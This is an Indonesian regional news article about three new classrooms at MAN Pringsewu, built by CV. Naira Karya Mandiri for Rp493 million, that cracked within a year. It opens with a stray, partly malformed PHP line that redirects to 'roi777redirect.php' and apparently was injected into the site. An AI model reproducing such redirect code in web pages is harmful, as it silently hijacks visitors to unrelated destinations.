header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Bangunan Baru MAN Pringsewu Belum Setahun Sudah Retak -
Bangunan Baru MAN Pringsewu Belum Setahun Sudah Retak

TRANSLAMUNG.COM, PRINGSEWU – Bantuan dari Kementerian Agama (Kemenag) Provinsi Lampung berupa 3 bangunan lokal kelas untuk Madrasah Aliyah Negeri (MAN) yang berada di Kabupaten Pringsewu belum genap satu tahun sudah banyak yang retak dan diduga asal-asalan.

Menurut informasi yang dihimpun translampung.com dilokas pembangunan, terlihat tiga lokal kelas yang dibangun dengan menelan anggaran sebesar Rp493 juta tersebut sudah banyak yang retak, terutama dinding lokal dan dinding di luar lokal.

Saat kami menghubungi Wakil Kepala Sekolah MAN, Bunyana melalui telpon, Kamis (5/4) membenarkan bahwa bangunan tersebut diserah terima pada tahun 2017 dan di pakai pada awal ajaran baru tepatnya bulan Juli 2017 lalu.

“Bangunan tersebut saat kami terima masih bagus mas, belum ada yang retak mas,” ujarnya Bunyana.

Diketahui tiga lokal bangunan tersebut merupakan bantuan Kemenag Provinsi Lampung untuk MAN Pringsewu yang menghabiskan anggaran sebesar Rp493 juta di kerjakan oleh CV. Naira Karya Mandiri.

Sampai berita ini diturunkan, pihak kemenag provinsi lampung dan CV.Naira karya Mandiri belum bisa di hubungi. (rez/hkw)

 

News Reporter